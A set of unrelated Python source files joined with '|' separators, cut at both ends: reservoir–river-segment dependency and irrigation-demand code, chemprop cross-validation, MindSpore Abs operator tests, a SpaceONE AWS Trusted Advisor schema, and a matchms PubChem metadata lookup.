            within threshold distance from reservoir main stream
    """
    # segments on the reservoir main stream (reservoir segment itself excluded)
    resstream = get_pfafs_start2end(pfaf_res, pfaf_outlet, river_shp, include_end=False)
    # get lookup list of downstream PFAFS
    downstream_lookup = get_downstream_PFAF(river_shp)
    tributaries_considered = []  # all considered tributaries
    tributaries_res = []         # all tributaries dependent on the reservoir
    count = 1
    for pfaf_resstream in resstream:
        print('processing tributaries of reach '+str(count)+' of '+str(len(resstream)), end='\r')
        if pfaf_resstream != pfaf_res:
            # determine tributaries draining through this main-stream reach
            subbasin = pfaf.get_subbasin(river_shp['PFAF'], pfaf_resstream, include_closed=False)
            all_tributaries = pfaf.get_tributaries(subbasin, 1)
            # check if dictionary is not empty
            if all_tributaries:
                for key in all_tributaries[pfaf_resstream].keys():
                    # get list of pfafs in one tributary
                    tributary = all_tributaries[pfaf_resstream][key]
                    # get list of downstream pfafs of tributary pfafs
                    downstream_tributary = downstream_lookup[downstream_lookup['PFAF'].isin(tributary)]['PFAF_downstream'].values.tolist()
                    # check if one or more segments of the tributary flow directly into resstream
                    inresstream = [True for trib in downstream_tributary if trib in resstream]
                    # get only new tributaries and tributaries that directly flow into resstream
                    if (tributary not in tributaries_considered) and inresstream:
                        # NEXT TO DO: only include if one pfaf of tributary list flows into resstream
                        if len(tributary) == 1:
                            # save length of tributary river
                            trib_length = river_shp.loc[river_shp['PFAF'] == tributary[0], 'Length']
                            # add segment to reservoir demand (possibly condition
                            # on segment length could be added here)
                            tributaries_res.append(tributary[0])
                            # POSSIBLY: extend condition based on length of segment? To be determined.
                        else:
                            # get all subtributaries of the segment that flows into resstream
                            all_subtributaries = pfaf.get_tributaries(tributary, 1)
                            for i in range(len(all_subtributaries.keys())):
                                pfaf_inresstream = list(all_subtributaries.keys())[i]
                                # initialise length_trib with the first segment length
                                length_trib = river_shp.loc[river_shp['PFAF'] == pfaf_inresstream, 'Length'].values[0]
                                # add segment to reservoir tributaries (served by reservoir)
                                # HERE THE CONDITION of first tributary to main stem can be adjusted.
                                tributaries_res.append(pfaf_inresstream)
                                # go down in subtributaries and apply threshold length condition
                                subtributaries_considered = []
                                for key in all_subtributaries[pfaf_inresstream].keys():
                                    # get list of pfafs in one subtributary
                                    subtributary = all_subtributaries[pfaf_inresstream][key]
                                    # check if the subtributary flows into the tributary
                                    downstream_subtributary = downstream_lookup[downstream_lookup['PFAF'].isin(subtributary)]['PFAF_downstream'].values.tolist()
                                    # concatenate resstream list and tributaries_res (if filled)
                                    considered = resstream+tributaries_res if tributaries_res else resstream
                                    intributary = [True for trib in downstream_subtributary if trib in considered]
                                    if (subtributary not in subtributaries_considered) and intributary:
                                        # remember it so we do not loop over it twice
                                        subtributaries_considered.append(subtributary)
                                        if len(subtributary) == 1:
                                            length_trib = length_trib + river_shp.loc[river_shp['PFAF'] == subtributary[0], 'Length'].values[0]
                                            if length_trib < threshold:
                                                tributaries_res.append(subtributary[0])
                                        else:
                                            # recurse down the multi-segment subtributary
                                            tributaries_res = godown_tributaries(subtributary, tributaries_res, river_shp, length_trib, threshold)
                        # save considered tributaries to not loop over them twice
                        tributaries_considered.append(tributary)
        # make sure to not include pfaf_res in tributaries_res
        if pfaf_res in tributaries_res: tributaries_res.remove(pfaf_res)
        count = count+1
    return tributaries_res + resstream
###################
# 4. Functions to determine topology based on conditions
def get_seg_dependency(pfaf_reservoirs, pfaf_outlets, seg_topo, threshold):
    """Create a dependency dictionary mapping each river segment pfaf to the
    reservoir pfafs that serve it, based on the following rules:
      1. segments must be on the reservoir main stream or on a tributary
         within the length threshold;
      2. a segment's bottom elevation cannot exceed the reservoir's.

    seg_topo is a pandas df with information on river topology.
    """
    dependency_dict = {}
    total = len(pfaf_reservoirs)
    # loop over reservoirs paired with their respective outlets
    for count, (pfaf_res, pfaf_outlet) in enumerate(zip(pfaf_reservoirs, pfaf_outlets), start=1):
        print('processing reservoir '+str(count)+' of '+str(total))
        ### CONDITIONS TO SELECT SEGMENTS PER RESERVOIR based on topology
        # reaches between reservoir and outlet, with a distance threshold
        # for second order tributaries
        pfaf_in_threshold = get_pfaf_resstream_and_in_tributary_threshold(
            pfaf_res, pfaf_outlet, seg_topo, threshold)
        # drop segments whose bottom elevation is above the reservoir's
        pfafs_selection = exclude_higher_botelev(pfaf_in_threshold, pfaf_res, seg_topo)
        #### END CONDITIONS
        # register this reservoir on every dependent segment
        for pfaf_seg in seg_topo.loc[seg_topo.PFAF.isin(pfafs_selection), 'PFAF'].values:
            dependency_dict.setdefault(pfaf_seg, []).append(pfaf_res)
    print('')
    return dependency_dict
def get_res_dependency(pfaf_reservoirs, seg_dependency_dict):
    """Get the list of segments dependent on each reservoir.

    input:  1. list with pfaf codes of reservoirs
            2. dict mapping each segment pfaf to its dependent reservoirs
    output: dict {reservoir pfaf: [contributing segment pfafs]}
    """
    res_dependency_dict = {}
    for pfaf_res in pfaf_reservoirs:
        # every segment whose reservoir list contains this reservoir
        res_dependency_dict[pfaf_res] = [
            seg for seg, reservoirs in seg_dependency_dict.items()
            if pfaf_res in reservoirs
        ]
    return res_dependency_dict
# helper: builds on get_res_dependency to count dependent segments per reservoir
def get_nhrus_per_res(pfaf_reservoirs, seg_dependency_dict):
    """Calculate the number of segments served by each reservoir.

    output: dict {reservoir pfaf: number of dependent segments}
    """
    # per-reservoir lists of dependent segments, in reservoir order
    res_dependency_dict = get_res_dependency(pfaf_reservoirs, seg_dependency_dict)
    return {pfaf_res: len(res_dependency_dict[pfaf_res]) for pfaf_res in pfaf_reservoirs}
def get_weights_per_seg(dependency_dict, seg_topo, pfaf_reservoirs, weigh_smax_with_nseg = True):
    """Assign weights to dependend reservoirs for each river segment
    returns dict with river segments and respective res weights.
    !!! look up df has to be replaced with GRanD maximal storages

    NOTE(review): this definition is dead code -- it is shadowed by the
    redefinition of ``get_weights_per_seg`` further down in this module
    (which adds a progress counter). Consider deleting one of the two.
    """
    if weigh_smax_with_nseg: # if weighting, get number of segments per reservoir
        nseg_res_dict = get_nhrus_per_res(pfaf_reservoirs, dependency_dict)
    weights_dict = {}
    # identify segments with multiple reservoirs
    for pfaf_seg in dependency_dict:
        print('processing segment '+str(pfaf_seg)+ ' of '+str(len(dependency_dict)),end='\r' )
        if len(dependency_dict[pfaf_seg])>1:
            max_storages = [] # initialise list wich is going to be divided by list of total storages
            for pfaf_res in dependency_dict[pfaf_seg]:
                # create list of maximum reservoirs storages based on PFAF codes
                # weigh max storage with number of segments the reservoir is providing to
                if weigh_smax_with_nseg:
                    nseg = nseg_res_dict[pfaf_res]
                    max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0] / nseg
                else: # just take max storages
                    max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0]
                max_storages.append(max_storage)
            # calculate weights and save in new dictionary
            weights_dict[pfaf_seg] = (max_storages/sum(max_storages)).tolist()
    return weights_dict
def get_weights_per_seg(dependency_dict, seg_topo, pfaf_reservoirs, weigh_smax_with_nseg = True):
    """Compute, per river segment, the weight of every reservoir it depends on.

    Weights are proportional to each reservoir's maximum storage ('lake_Vol'
    in seg_topo), optionally divided by the number of segments the reservoir
    serves. Segments with a single reservoir are skipped (implicit weight 1).
    Returns a dict mapping segment pfaf -> list of weights in the same order
    as the reservoir list in dependency_dict.
    !!! look up df has to be replaced with GRanD maximal storages
    """
    if weigh_smax_with_nseg:
        # number of dependent segments per reservoir, used to spread storage
        nseg_res_dict = get_nhrus_per_res(pfaf_reservoirs, dependency_dict)
    weights_dict = {}
    n_segments = len(dependency_dict.keys())
    for count, pfaf_seg in enumerate(dependency_dict, start=1):
        print('processing segment '+str(count)+ ' of '+str(n_segments),end='\r' )
        reservoirs = dependency_dict[pfaf_seg]
        # only segments served by several reservoirs need explicit weights
        if len(reservoirs) > 1:
            max_storages = []
            for pfaf_res in reservoirs:
                smax = seg_topo.loc[seg_topo['PFAF'] == pfaf_res, 'lake_Vol'].values[0]
                if weigh_smax_with_nseg:
                    smax = smax / nseg_res_dict[pfaf_res]
                max_storages.append(smax)
            storage_total = sum(max_storages)
            # normalise so the weights of one segment sum to 1
            weights_dict[pfaf_seg] = [float(smax / storage_total) for smax in max_storages]
    print('')
    return weights_dict
def get_res_dependency_and_weights(pfaf_reservoirs, seg_dependency_dict, weights_dict):
    """Get list of segments dependend per reservoir, both in pfaf as in weights

    input: 1. list with pfaf codes of reservoirs,
           2. dictionary with per segment dependend reservoirs
           3. dictionary with weights per segment dependend reservoir
    output: res_dependency_dict[pfaf_res][pfaf_to_sum] = weight
            dictionary with first level keys: reservoir pfafs
            second level keys: contributing river segments pfafs
            values: correspoding weights
    """
    res_dependency_dict = {}
    for pfaf_res in pfaf_reservoirs:
        contributions = {}  # segment pfaf -> weight for this reservoir
        for pfaf_seg, lookup_pfaf_res in seg_dependency_dict.items():
            if pfaf_res not in lookup_pfaf_res:
                continue
            if len(lookup_pfaf_res) == 1:
                # sole reservoir of this segment: full weight
                contributions[pfaf_seg] = 1
            else:
                # position of the reservoir in the segment's list selects its weight
                contributions[pfaf_seg] = weights_dict[pfaf_seg][lookup_pfaf_res.index(pfaf_res)]
        res_dependency_dict[pfaf_res] = contributions
    return res_dependency_dict
###################
# 5. Functions to calculate irrigation demand
def calc_demand_per_res(hrus_shp, res_topo_dict):
    """Calculate irrigation demand per reservoir.

    input: dataframe with hru pfaf codes and irrigation demand ('basinIrrig')
           dictionary with reservoir dependencies and weights
    output: dictionary with reservoirs and corresponding water demands
    """
    demand_dict = {}
    n_reservoirs = len(res_topo_dict)
    for count, reservoir in enumerate(res_topo_dict, start=1):
        print('calculating demand for reservoir '+str(count)+ ' of '+str(n_reservoirs),end='\r' )
        # weighted sum of the demand of every contributing river segment
        demand_tot = 0
        for seg_tosum, seg_weight in res_topo_dict[reservoir].items():
            # segments missing from the shapefile contribute nothing
            if seg_tosum in hrus_shp['PFAF'].values:
                demand_tot = demand_tot + hrus_shp.loc[hrus_shp['PFAF']==seg_tosum, 'basinIrrig'].values[0] * seg_weight
        demand_dict[reservoir] = demand_tot
    return demand_dict
|
from collections import defaultdict
import csv
import json
from logging import Logger
import os
import sys
from typing import Callable, Dict, List, Tuple
import subprocess
import numpy as np
import pandas as pd
from .run_training import run_training
from chemprop.args import TrainArgs
from chemprop.constants import TEST_SCORES_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_task_names, MoleculeDataset, validate_dataset_type
from chemprop.utils import create_logger, makedirs, timeit
from chemprop.features import set_extra_atom_fdim, set_extra_bond_fdim, set_explicit_h, set_reaction, reset_featurization_parameters
@timeit(logger_name=TRAIN_LOGGER_NAME)
def cross_validate(args: TrainArgs,
                   train_func: Callable[[TrainArgs, MoleculeDataset, Logger], Dict[str, List[float]]]
                   ) -> Tuple[float, float]:
    """
    Runs k-fold cross-validation.
    For each of k splits (folds) of the data, trains and tests a model on that split
    and aggregates the performance across folds.
    :param args: A :class:`~chemprop.args.TrainArgs` object containing arguments for
                 loading data and training the Chemprop model.
    :param train_func: Function which runs training.
    :return: A tuple containing the mean and standard deviation performance across folds.
    """
    logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
    # Fall back to plain print() when no logger could be created.
    if logger is not None:
        debug, info = logger.debug, logger.info
    else:
        debug = info = print
    # Initialize relevant variables
    # (seed and save_dir are remembered here because they are overwritten per fold below)
    init_seed = args.seed
    save_dir = args.save_dir
    args.task_names = get_task_names(path=args.data_path, smiles_columns=args.smiles_columns,
                                     target_columns=args.target_columns, ignore_columns=args.ignore_columns)
    # Print command line
    debug('Command line')
    debug(f'python {" ".join(sys.argv)}')
    # Print args
    debug('Args')
    debug(args)
    # Save args
    makedirs(args.save_dir)
    try:
        args.save(os.path.join(args.save_dir, 'args.json'))
    except subprocess.CalledProcessError:
        # Writing the reproducibility section shells out (hence the subprocess
        # error); retry without it rather than failing the whole run.
        debug('Could not write the reproducibility section of the arguments to file, thus omitting this section.')
        args.save(os.path.join(args.save_dir, 'args.json'), with_reproducibility=False)
    #set explicit H option and reaction option
    reset_featurization_parameters(logger=logger)
    set_explicit_h(args.explicit_h)
    set_reaction(args.reaction, args.reaction_mode)
    # Get data
    debug('Loading data')
    data = get_data(
        path=args.data_path,
        args=args,
        logger=logger,
        skip_none_targets=True,
        data_weights_path=args.data_weights_path
    )
    validate_dataset_type(data, dataset_type=args.dataset_type)
    args.features_size = data.features_size()
    # Propagate extra atom/bond feature sizes from the dataset into the
    # featurizer and the model arguments.
    if args.atom_descriptors == 'descriptor':
        args.atom_descriptors_size = data.atom_descriptors_size()
        args.ffn_hidden_size += args.atom_descriptors_size
    elif args.atom_descriptors == 'feature':
        args.atom_features_size = data.atom_features_size()
        set_extra_atom_fdim(args.atom_features_size)
    if args.bond_features_path is not None:
        args.bond_features_size = data.bond_features_size()
        set_extra_bond_fdim(args.bond_features_size)
    debug(f'Number of tasks = {args.num_tasks}')
    if args.target_weights is not None and len(args.target_weights) != args.num_tasks:
        raise ValueError('The number of provided target weights must match the number and order of the prediction tasks')
    # Run training on different random seeds for each fold
    all_scores = defaultdict(list)  # metric name -> one entry per fold of per-task scores
    for fold_num in range(args.num_folds):
        info(f'Fold {fold_num}')
        args.seed = init_seed + fold_num
        args.save_dir = os.path.join(save_dir, f'fold_{fold_num}')
        makedirs(args.save_dir)
        data.reset_features_and_targets()
        # If resuming experiment, load results from trained models
        test_scores_path = os.path.join(args.save_dir, 'test_scores.json')
        if args.resume_experiment and os.path.exists(test_scores_path):
            print('Loading scores')
            with open(test_scores_path) as f:
                model_scores = json.load(f)
        # Otherwise, train the models
        else:
            model_scores = train_func(args, data, logger)
        for metric, scores in model_scores.items():
            all_scores[metric].append(scores)
    all_scores = dict(all_scores)
    # Convert scores to numpy arrays
    for metric, scores in all_scores.items():
        all_scores[metric] = np.array(scores)
    # Report results
    info(f'{args.num_folds}-fold cross validation')
    # Report scores for each fold
    for fold_num in range(args.num_folds):
        for metric, scores in all_scores.items():
            info(f'\tSeed {init_seed + fold_num} ==> test {metric} = {np.nanmean(scores[fold_num]):.6f}')
            if args.show_individual_scores:
                for task_name, score in zip(args.task_names, scores[fold_num]):
                    info(f'\t\tSeed {init_seed + fold_num} ==> test {task_name} {metric} = {score:.6f}')
    # Report scores across folds
    for metric, scores in all_scores.items():
        avg_scores = np.nanmean(scores, axis=1)  # average score for each model across tasks
        mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)
        info(f'Overall test {metric} = {mean_score:.6f} +/- {std_score:.6f}')
        if args.show_individual_scores:
            for task_num, task_name in enumerate(args.task_names):
                info(f'\tOverall test {task_name} {metric} = '
                     f'{np.nanmean(scores[:, task_num]):.6f} +/- {np.nanstd(scores[:, task_num]):.6f}')
    # Save scores
    with open(os.path.join(save_dir, TEST_SCORES_FILE_NAME), 'w') as f:
        writer = csv.writer(f)
        header = ['Task']
        for metric in args.metrics:
            header += [f'Mean {metric}', f'Standard deviation {metric}'] + \
                      [f'Fold {i} {metric}' for i in range(args.num_folds)]
        writer.writerow(header)
        if args.dataset_type == 'spectra': # spectra data type has only one score to report
            row = ['spectra']
            for metric, scores in all_scores.items():
                task_scores = scores[:,0]
                mean, std = np.nanmean(task_scores), np.nanstd(task_scores)
                row += [mean, std] + task_scores.tolist()
            writer.writerow(row)
        else: # all other data types, separate scores by task
            for task_num, task_name in enumerate(args.task_names):
                row = [task_name]
                for metric, scores in all_scores.items():
                    task_scores = scores[:, task_num]
                    mean, std = np.nanmean(task_scores), np.nanstd(task_scores)
                    row += [mean, std] + task_scores.tolist()
                writer.writerow(row)
    # Determine mean and std score of main metric
    avg_scores = np.nanmean(all_scores[args.metric], axis=1)
    mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)
    # Optionally merge and save test preds
    if args.save_preds:
        all_preds = pd.concat([pd.read_csv(os.path.join(save_dir, f'fold_{fold_num}', 'test_preds.csv'))
                               for fold_num in range(args.num_folds)])
        all_preds.to_csv(os.path.join(save_dir, 'test_preds.csv'), index=False)
    return mean_score, std_score
def chemprop_train() -> None:
    """Parses Chemprop training arguments and trains (cross-validates) a Chemprop model.

    This is the entry point for the command line command :code:`chemprop_train`.
    """
    # Parse CLI arguments, then hand off to k-fold cross-validation.
    args = TrainArgs().parse_args()
    cross_validate(args=args, train_func=run_training)
|
import mindspore
import numpy as np
from mindspore import context, ms_function
from mindspore import nn, Tensor
from mindspore.ops import GradOperation, operations as P
# Run all ops on CPU in static graph mode so these tests exercise the
# graph-compiled CPU kernels rather than PyNative execution.
context.set_context(device_target="CPU")
context.set_context(mode=context.GRAPH_MODE)
class OpNetWrapper(nn.Cell):
    """Thin Cell wrapper forwarding runtime inputs (plus fixed extra args) to an op."""

    def __init__(self, op, *args, **kwargs):
        super().__init__()
        # Remember the primitive and any constant arguments appended on every call.
        self.op = op
        self.args = args
        self.kwargs = kwargs

    def construct(self, *inputs):
        # Call order: runtime inputs first, then the stored constants.
        return self.op(*inputs, *self.args, **self.kwargs)
class Grad(nn.Cell):
    """Computes gradients of a wrapped network with respect to all of its inputs."""

    def __init__(self, network):
        super().__init__()
        # sens_param=True: the caller supplies the output gradient (sensitivity).
        self.grad = GradOperation(get_all=True, sens_param=True)
        self.network = network

    @ms_function
    def construct(self, input_, output_grad):
        grad_fn = self.grad(self.network)
        return grad_fn(input_, output_grad)
########################################################################################################################
# Test Code
########################################################################################################################
def test_00_base():
    """Forward check: Abs maps [-1, 0, 1] to [1, 0, 1]."""
    op_wrapper = OpNetWrapper(P.Abs())
    input_x = Tensor(np.array([-1, 0, 1]), mindspore.float32)
    outputs = op_wrapper(input_x)
    print("input is:", input_x)
    print("output is:", outputs)
    assert np.allclose(outputs.asnumpy(), [1., 0., 1.])
def test_01_grad():
    """Backward check: d|x|/dx is sign(x), with zero gradient at x == 0."""
    op_wrapper = OpNetWrapper(P.Abs())
    input_x = Tensor(np.array([-3, -2, -1, -0, 0, 1, 2, 3]), mindspore.float32)
    outputs = op_wrapper(input_x)
    # Upstream sensitivity 0..7, so each element's sign is scaled by its index.
    sens = Tensor(np.arange(int(np.prod(outputs.shape))).reshape(outputs.shape), mindspore.float32)
    input_grad = Grad(op_wrapper)(input_x, sens)
    print("input is:", input_x)
    print("outputs is:", outputs)
    print("sens is:", sens.asnumpy())
    print("input_grad is:", input_grad[0].asnumpy())
    assert np.allclose(input_grad[0].asnumpy(), [-0., -1., -2., 0., 0., 5., 6., 7.])
if __name__ == '__main__':
    # Allow running this test module directly, outside of pytest.
    test_00_base()
    test_01_grad()
|
"""A package of the implementation of the Conjugate Gradient solver for project 1.""" |
from spaceone.inventory.libs.schema.metadata.dynamic_field import TextDyField, SearchField, EnumDyField
from spaceone.inventory.libs.schema.cloud_service_type import CloudServiceTypeResource, CloudServiceTypeResponse, \
CloudServiceTypeMeta
# Cloud service type definition for AWS Trusted Advisor checks.
cst_ta = CloudServiceTypeResource()
cst_ta.name = 'Check'
cst_ta.provider = 'aws'
cst_ta.group = 'TrustedAdvisor'
cst_ta.labels = ['Management']
# Primary resource for the TrustedAdvisor group in the console menu.
cst_ta.is_primary = True
cst_ta.tags = {
    'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/cloud-services/aws/AWS-Trusted-Advisor.svg',
}
# Table layout (fields) and search filters shown in the SpaceONE console.
cst_ta._metadata = CloudServiceTypeMeta.set_meta(
    fields=[
        TextDyField.data_source('Category', 'data.category'),
        TextDyField.data_source('Name', 'data.name'),
        # Map Trusted Advisor check statuses onto console state colors.
        EnumDyField.data_source('Status', 'data.status', default_state={
            'safe': ['ok'],
            'warning': ['warning'],
            'alert': ['error'],
            'disable': ['not_available']
        }),
        TextDyField.data_source('Check ID', 'data.check_id'),
    ],
    search=[
        SearchField.set(name='Check ID', key='data.check_id'),
        SearchField.set(name='Category', key='data.category'),
        SearchField.set(name='Status', key='data.status'),
        SearchField.set(name='AWS Account ID', key='data.account_id'),
    ]
)
# Exported list consumed by the collector plugin.
CLOUD_SERVICE_TYPES = [
    CloudServiceTypeResponse({'resource': cst_ta}),
]
|
import logging
import re
import pubchempy as pcp
import numpy as np
from matchms.utils import is_valid_inchikey
logger = logging.getLogger("matchms")
def pubchem_metadata_lookup(spectrum_in, name_search_depth=10, match_precursor_mz=False,
                            formula_search=False,
                            mass_tolerance=2.0,
                            allowed_differences=None,
                            min_formula_length=6,
                            formula_search_depth=25,
                            verbose=2):
    """Try to complete missing InChI/InChIKey/SMILES metadata via PubChem.

    First searches PubChem by compound name and accepts a candidate when its
    InChI matches the (possibly defective) input InChI, or when its exact mass
    matches the spectrum's parent mass (optionally also the precursor m/z).
    If that fails, an optional molecular-formula search is run the same way.

    Parameters
    ----------
    spectrum_in
        Matchms type spectrum as input.
    name_search_depth: int
        How many of the most relevant name matches to explore deeper. Default = 10.
    match_precursor_mz: bool
        If True, also attempt to match candidates against the precursor m/z.
    formula_search: bool
        If True, fall back to searching PubChem by molecular formula.
    mass_tolerance: float
        Acceptable mass difference between query compound and pubchem result.
    allowed_differences: list of (float, float) tuples, optional
        Additional accepted mass differences given as (difference, tolerance)
        pairs. Defaults to [(18.03, 0.01)].
    min_formula_length: int
        Minimum length of the formula string to attempt a formula search.
    formula_search_depth: int
        How many formula matches to retrieve from PubChem. Default = 25.
    verbose: int
        Verbosity level for additional log messages.

    Returns
    -------
    A (cloned) spectrum with inchi/inchikey/smiles set when a match was found,
    otherwise the input spectrum; None if `spectrum_in` is None.
    """
    # Avoid the mutable-default-argument pitfall: build the default per call.
    if allowed_differences is None:
        allowed_differences = [(18.03, 0.01)]
    if spectrum_in is None:
        return None
    if is_valid_inchikey(spectrum_in.get("inchikey")):
        # Metadata already complete; nothing to look up.
        return spectrum_in
    spectrum = spectrum_in.clone()

    def _plausible_name(compound_name):
        # Very short strings are unlikely to be real compound names.
        return (isinstance(compound_name, str) and len(compound_name) > 4)

    compound_name = spectrum.get("compound_name")
    if not _plausible_name(compound_name):
        logger.info("No plausible compound name found (%s)", compound_name)
        return spectrum

    # Start pubchem search
    inchi = spectrum.get("inchi")
    parent_mass = spectrum.get("parent_mass")
    if isinstance(parent_mass, np.ndarray):
        parent_mass = parent_mass[0]
    formula = spectrum.get("formula")

    # Initialize candidate results up front. Fixes an UnboundLocalError that
    # occurred when the name search returned no results and the formula branch
    # below then evaluated `inchikey_pubchem is None`.
    inchi_pubchem = None
    inchikey_pubchem = None
    smiles_pubchem = None

    # 1) Search for matching compound name
    results_pubchem = pubchem_name_search(compound_name, name_search_depth=name_search_depth,
                                          verbose=verbose)
    if len(results_pubchem) > 0:
        logger.info("Found potential matches for compound name (%s) on PubChem",
                    compound_name)
        # 1a) Search for matching inchi
        if likely_has_inchi(inchi):
            inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_inchi_match(results_pubchem, inchi,
                                                                                      verbose=verbose)
        # 1b) Search for matching parent mass
        if not likely_has_inchi(inchi) or inchikey_pubchem is None:
            inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
                                                                                     parent_mass,
                                                                                     given_mass="parent mass",
                                                                                     mass_tolerance=mass_tolerance,
                                                                                     allowed_differences=allowed_differences,
                                                                                     verbose=verbose)
        # 1c) Search for matching precursor mass (optional)
        if match_precursor_mz and inchikey_pubchem is None:
            precursor_mz = spectrum.get("precursor_mz")
            inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
                                                                                     precursor_mz,
                                                                                     given_mass="precursor mass",
                                                                                     mass_tolerance=mass_tolerance,
                                                                                     allowed_differences=allowed_differences,
                                                                                     verbose=verbose)
        if inchikey_pubchem is not None and inchi_pubchem is not None:
            logger.info("Matching compound name: %s", compound_name)
            spectrum.set("inchikey", inchikey_pubchem)
            spectrum.set("inchi", inchi_pubchem)
            spectrum.set("smiles", smiles_pubchem)
            return spectrum
        if verbose >= 2:
            logger.info("No matches found for compound name: %s", compound_name)
    else:
        logger.info("No matches for compound name (%s) on PubChem",
                    compound_name)

    # 2) Search for matching formula
    if formula_search and formula and len(formula) >= min_formula_length:
        results_pubchem = pubchem_formula_search(formula, formula_search_depth=formula_search_depth,
                                                 verbose=verbose)
        if len(results_pubchem) > 0:
            logger.info("Found potential matches for formula (%s) on PubChem",
                        formula)
            # 2a) Search for matching inchi
            if likely_has_inchi(inchi):
                inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_inchi_match(results_pubchem, inchi,
                                                                                          verbose=verbose)
            # 2b) Search for matching parent mass
            if inchikey_pubchem is None:
                inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
                                                                                         parent_mass,
                                                                                         given_mass="parent mass",
                                                                                         mass_tolerance=mass_tolerance,
                                                                                         allowed_differences=allowed_differences,
                                                                                         verbose=verbose)
            # 2c) Search for matching precursor mass (optional)
            if match_precursor_mz and inchikey_pubchem is None:
                precursor_mz = spectrum.get("precursor_mz")
                inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
                                                                                         precursor_mz,
                                                                                         given_mass="precursor mass",
                                                                                         mass_tolerance=mass_tolerance,
                                                                                         allowed_differences=allowed_differences,
                                                                                         verbose=verbose)
            if inchikey_pubchem is not None and inchi_pubchem is not None:
                # Fixed: this success was previously logged twice in a row.
                logger.info("Matching formula: %s", formula)
                spectrum.set("inchikey", inchikey_pubchem)
                spectrum.set("inchi", inchi_pubchem)
                spectrum.set("smiles", smiles_pubchem)
                return spectrum
            if verbose >= 2:
                logger.info("No matches found for formula: %s", formula)
        else:
            logger.info("No matches for formula (%s) on PubChem",
                        formula)
    return spectrum
def likely_has_inchi(inchi):
    """Quick test to avoid excess in-depth testing"""
    if inchi is None:
        return False
    # Look for the typical 'InChI=1S/<formula>/c...' (or '1/<formula>/h...') layout.
    candidate = inchi.strip('"')
    pattern = r"(InChI=1|1)(S\/|\/)[0-9, A-Z, a-z,\.]{2,}\/(c|h)[0-9]"
    return re.search(pattern, candidate) is not None
def likely_inchi_match(inchi_1, inchi_2, min_agreement=3):
    """Try to match defective inchi to non-defective ones.

    Compares inchi parts seperately. Match is found if at least the first
    'min_agreement' parts are a good enough match.
    The main 'defects' this method accounts for are missing '-' in the inchi.
    In addition, differences between '-', '+', and '?' will be ignored.

    Parameters
    ----------
    inchi_1: str
        inchi of molecule.
    inchi_2: str
        inchi of molecule.
    min_agreement: int
        Minimum number of first parts that MUST be a match between both input
        inchi to finally consider it a match. Default is min_agreement=3.

    Returns
    -------
    bool
        True when the first `min_agreement` parts of both inchi agree.
    """
    if min_agreement < 2:
        logger.warning("Warning! 'min_agreement' < 2 has no discriminative power. Should be => 2.")
    if min_agreement == 2:
        # Fixed: the message tail was previously passed as a second positional
        # argument, which logging treats as a %-format arg (formatting error).
        logger.warning("Warning! 'min_agreement' == 2 has little discriminative power "
                       "(only looking at structure formula. Better use > 2.")
    agreement = 0

    # Remove spaces and '"' to account for different notations.
    # Remove everything with little discriminative power.
    ignore_lst = ['"', ' ', '-', '+', '?']
    for ignore in ignore_lst:
        inchi_1 = inchi_1.replace(ignore, '')
        inchi_2 = inchi_2.replace(ignore, '')

    # Split inchi in parts.
    inchi_1_parts = inchi_1.split('/')
    inchi_2_parts = inchi_2.split('/')

    # Check if both inchi have sufficient parts (seperated by '/')
    if len(inchi_1_parts) >= min_agreement and len(
            inchi_2_parts) >= min_agreement:
        # Count how many parts agree well
        for i in range(min_agreement):
            agreement += (inchi_1_parts[i] == inchi_2_parts[i])
    return bool(agreement == min_agreement)
def likely_inchikey_match(inchikey_1, inchikey_2, min_agreement=1):
    """Try to match inchikeys.

    Compares inchikey parts seperately. Match is found if at least the first
    'min_agreement' parts are a good enough match.

    Parameters
    ----------
    inchikey_1: str
        inchikey of molecule.
    inchikey_2: str
        inchikey of molecule.
    min_agreement: int
        Minimum number of first parts that MUST be a match between both input
        inchikey to finally consider it a match. Default is min_agreement=1.

    Returns
    -------
    bool
        True when the first `min_agreement` parts of both inchikeys agree.
    """
    if min_agreement not in [1, 2, 3]:
        logger.error("Warning! 'min_agreement' should be 1, 2, or 3.")
    agreement = 0

    # Harmonize strings
    inchikey_1 = inchikey_1.upper().replace('"', '').replace(' ', '')
    inchikey_2 = inchikey_2.upper().replace('"', '').replace(' ', '')

    # Split inchikey in parts.
    inchikey_1_parts = inchikey_1.split('-')
    inchikey_2_parts = inchikey_2.split('-')

    # Check if both inchikey have sufficient parts (seperated by '-')
    if len(inchikey_1_parts) >= min_agreement and len(
            inchikey_2_parts) >= min_agreement:
        # Count how many parts mostly agree
        for i in range(min_agreement):
            agreement += (inchikey_1_parts[i] == inchikey_2_parts[i])
    # Fixed: return an explicit bool in every case (previously returned None
    # when either inchikey had fewer than `min_agreement` parts), consistent
    # with likely_inchi_match.
    return bool(agreement == min_agreement)
def pubchem_name_search(compound_name: str, name_search_depth=10, verbose=1):
    """Search pubmed for compound name"""
    results_pubchem = pcp.get_compounds(compound_name,
                                        'name',
                                        listkey_count=name_search_depth)
    # Retry with underscores replaced by spaces, a common naming difference.
    if not results_pubchem and "_" in compound_name:
        results_pubchem = pcp.get_compounds(compound_name.replace("_", " "),
                                            'name',
                                            listkey_count=name_search_depth)
    if not results_pubchem:
        return []
    logger.debug("Found at least %s compounds of that name on pubchem.", len(results_pubchem))
    return results_pubchem
def pubchem_formula_search(compound_formula: str, formula_search_depth=25, verbose=1):
    """Search pubmed for compound formula"""
    sids_pubchem = pcp.get_sids(compound_formula,
                                'formula',
                                listkey_count=formula_search_depth)
    # Fetch the full compound record for every substance hit.
